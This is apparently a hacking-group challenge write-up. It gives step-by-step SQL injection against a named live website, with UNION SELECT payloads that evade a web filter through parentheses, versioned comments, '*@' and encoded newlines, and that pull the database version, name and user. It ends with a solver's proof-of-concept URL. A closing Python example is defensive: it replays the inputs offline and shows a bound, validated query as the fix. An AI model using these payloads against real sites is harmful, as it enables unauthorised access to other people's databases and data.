
SQLi-2 Solution

 

        <----Solution----> 

--------------------------------------------------------------------------

/**_**/ Let's start /**_**/

Site: https://androssov.ru/briefly/post.php?id=1

**OK, let's check whether the site is vulnerable or not

--> https://androssov.ru/briefly/post.php?id=1'

OK, when we add a (') after the parameter value, we can see that some content of this site is missing.

**Ok let's Try to fix the site-

-->https://androssov.ru/briefly/post.php?id=1'--+-

OK, the site is fixed.

**Let's Count The Number Of Columns.

---> https://androssov.ru/briefly/post.php?id=1' order by 10--+-    Error❌

-->https://androssov.ru/briefly/post.php?id=1' order by 9--+- Fixed. That means this site has 9 columns. ✅

**OK, let's select the union

--> https://androssov.ru/briefly/post.php?id=1'UNION SELECT 1,2,3,4,5,6,7,8,9--+-❎

Oops, it shows 403 Forbidden ❌

**Let's try another way to fix the error.

--> https://androssov.ru/briefly/post.php... /*!50000SELECT*/ 1,2,3,4,5,6,7,8,9--+-❎

Wow, the site is working... ⭕ but we can't use anything with union ❌

***Let's Try another way...

---> https://androssov.ru/briefly/post.php?id=1'UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9))--+-

It's working well ✅ But it's not showing the vulnerable column ❎

**Let's try to show the vulnerable column.

--->https://androssov.ru/briefly/post.php?id=.1'UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9))--+- 

OK, the site is showing the vulnerable column ✅

But we can't use anything before the parameter value and also (and,or,but,0,false)

***OK, let's try showing the vulnerable column in a new way...😉

--> https://androssov.ru/briefly/post.php?id=1'  *@ UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9))--+-

When we add *@ after the parameter value, the site shows the vulnerable column. ✅

**Ok guys Let's Print CN,Version, Database :-:

:-: Version :-:

-->https://androssov.ru/briefly/post.php?id=1'  *@ UNION(SELECT(1),(2),(3),(4),(concat(version())),(6),(7),(8),(9))--+- ✅

:-: CN,Version :-:

---> https://androssov.ru/briefly/post.php?id=1'  *@ UNION(SELECT(1),(2),(3),(4),(concat("D@Rk Hv3X",'<br>',version())),(6),(7),(8),(9))--+-

Wow, I'm able to print the version and CN, but the rule is that I can't use <br> or \n. ❎

-->But We can use <p>,<li> 😁✅

**Let's print CN,Version, database, user :-:

---> https://androssov.ru/briefly/post.php?id=1'  *@ UNION(SELECT(1),(2),(3),(4),(concat( 0x4440526b2048763358 , '<li>' ,version(),'<li>',database/**_**/(),'<li>',user())),(6),(7),(8),(9))--+-

End.

Solvers poc :-:

-------------------------------------/------------------------------------

------->  https://androssov.ru/briefly/post.php?id=1' %26%26  not true union %23%0aselect%23%0a 1,2,version(),4,concat%23%0a('gana de leon<p>',version(),'<p>',user(),'<p>',/*!12345schEMA%23%0A*/()),6,7,8,9 --+-

 Thanks Bro for ur poc
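
A defender's view of the steps above, as an added example that is not part of the original post: the same inputs run against a string-built query, a keyword filter, and a validated, bound query. Assumptions: sqlite3 stands in for the site's database so the code runs offline, and the `posts` table, the `BLOCKLIST` regex and all function names are hypothetical.

```python
import re
import sqlite3

# Hypothetical keyword blocklist standing in for the filter that returned 403.
BLOCKLIST = re.compile(r"union\s+select", re.IGNORECASE)

def make_db():
    """Constructed 9-column table, matching the column count found in the write-up."""
    conn = sqlite3.connect(":memory:")
    cols = ", ".join(f"c{i} TEXT" for i in range(2, 10))
    conn.execute(f"CREATE TABLE posts (id INTEGER PRIMARY KEY, {cols})")
    conn.execute("INSERT INTO posts VALUES (1,'a','b','c','d','e','f','g','h')")
    return conn

def waf_allows(raw_id):
    """True when the keyword filter lets the value through."""
    return BLOCKLIST.search(raw_id) is None

def fetch_concat(conn, raw_id):
    """Vulnerable pattern: the id parameter becomes part of the SQL text."""
    try:
        return conn.execute("SELECT * FROM posts WHERE id='" + raw_id + "'").fetchall()
    except sqlite3.Error:
        return "sql-error"  # what the visitor sees as missing page content

def fetch_bound(conn, raw_id):
    """Hardened: accept only a short decimal id, then bind it as a parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    return conn.execute("SELECT * FROM posts WHERE id = ?", (int(raw_id),)).fetchall()

# Inputs taken from the write-up, URL-decoded ("--+-" becomes "-- -").
QUOTE = "1'"
ORDER_10 = "1' order by 10-- -"
ORDER_9 = "1' order by 9-- -"
UNION_PLAIN = "1'UNION SELECT 1,2,3,4,5,6,7,8,9-- -"
UNION_PARENS = "1'UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9))-- -"

if __name__ == "__main__":
    db = make_db()
    for value in (QUOTE, ORDER_10, ORDER_9, UNION_PLAIN, UNION_PARENS):
        print(repr(value), "| filter allows:", waf_allows(value),
              "| bound query rows:", len(fetch_bound(db, value)))
```

The keyword filter stops only one spelling of the statement, while the validated, bound query returns nothing for every input in the write-up.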
